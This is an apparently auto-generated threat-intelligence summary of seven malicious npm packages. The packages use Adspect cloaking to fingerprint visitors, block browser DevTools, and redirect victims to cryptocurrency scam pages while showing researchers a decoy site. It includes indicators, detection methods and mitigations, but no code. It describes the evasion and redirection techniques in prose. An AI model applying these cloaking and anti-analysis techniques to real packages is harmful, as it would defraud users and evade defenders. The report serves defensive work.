Full Report
Seven packages published on the Node Package Manager (npm) registry use the Adspect cloud-based service to separate researchers from potential victims and lead them to malicious locations. [...]
Analysis Summary
# Tool/Technique: Malicious NPM Packages Abusing Adspect Redirects
## Overview
A set of seven malicious packages published on the Node Package Manager (npm) registry that utilize the Adspect cloud-based service for an obfuscation and redirection scheme. The primary goal is to direct legitimate victims to cryptocurrency scam sites while showing benign content to security researchers attempting analysis.
## Technical Details
- Type: Malware/Technique (Supply Chain Compromise via Malicious Packages)
- Platform: JavaScript/Node.js environment (npm packages executed in web applications)
- Capabilities: Visitor fingerprinting, anti-analysis checks, redirection to malicious infrastructure.
- First Seen: Shortly before November 17, 2025 (Packages published between September and November).
## MITRE ATT&CK Mapping
- **TA0001 - Initial Access**
- T1195 - Supply Chain Compromise
- T1195.002 - Compromise Software Supply Chain
- **TA0005 - Defense Evasion**
- T1027 - Obfuscated Files or Information
- T1057 - Process Discovery
- T1497 - Virtualization/Sandbox Evasion (Implicit via anti-analysis checks)
## Functionality
### Core Capabilities
- **Code Execution:** Malicious code packaged within npm modules executes automatically upon page load via an Immediately Invoked Function Expression (IIFE).
- **Visitor Fingerprinting:** Gathers extensive browser and environmental data (User Agent, host, referrer, URI, query string, protocol, language, accepted content types) to create a visitor profile.
- **Redirection:** Sends fingerprinting data to a threat actor proxy, retrieves the victim's real IP, and forwards the data to the Adspect API for classification.
### Advanced Features
- **Adspect Cloaking:** Leverages the Adspect service to differentiate between legitimate targets and security researchers based on environmental data.
- **Anti-Analysis:** Implements specific checks to hinder security inspection:
- Blocking right-click functionality.
- Blocking keyboard shortcuts (F12, Ctrl+U, Ctrl+Shift+I).
- Detecting and triggering a page reload if browser DevTools are identified.
- **Payload Delivery:**
- **Target Victims:** Redirected to cryptocurrency scam sites (e.g., Ethereum, Solana themed CAPTCHA pages), followed by opening an Adspect-defined URL in a new tab disguised as a user action.
- **Security Researchers:** Served a fake, benign Offlido company webpage to reduce suspicion and detection.
## Indicators of Compromise
- File Hashes: N/A (Specific hashes not provided in context)
- File Names: The seven malicious packages: `signals-embed`, `dsidospsodlks`, `applicationooks21`, `application-phskck`, `integrator-filescrypt2025`, `integrator-2829`, `integrator-2830`.
- Registry Keys: N/A
- Network Indicators: Use of the **Adspect API** for classification and redirection.
- Behavioral Indicators: Automatic execution via IIFE on load; attempt to disable browser debugging tools (F12 detection); redirection sequences initiated upon classification.
## Associated Threat Actors
The packages were published under the developer name **'dino\_reborn'** (email: geneboo@proton[.]me). The ultimate goal involves directing victims to cryptocurrency scam sites.
## Detection Methods
- **Signature-based detection:** Signatures targeting the unique 39kB cloaking code snippet or the specific package names/developer handle.
- **Behavioral detection:** Monitoring for scripts that immediately attempt to disable common browser debugging features (right-click context menu suppression, F12 key monitoring) upon JavaScript execution. Monitoring for unexpected browser interaction masking (opening new tabs disguised as user action).
- **YARA rules if available:** N/A
## Mitigation Strategies
- Strict dependency scanning and vulnerability management targeting npm packages for known malicious patterns or unexpected code execution upon installation/load.
- Implementing security policies that limit website interaction hijacking mechanisms.
- Disabling automatic execution of downloaded third-party scripts where possible, or running them in sandboxed environments.
- Monitoring for unusual outbound network traffic to external services (like Adspect) originating from application initialization code.
## Related Tools/Techniques
- Ad-hoc cloaking/fingerprinting scripts leveraging legitimate third-party services (like Adspect) for blending in or evading sandbox analysis.
- Previous npm supply chain attacks that utilized obfuscation libraries.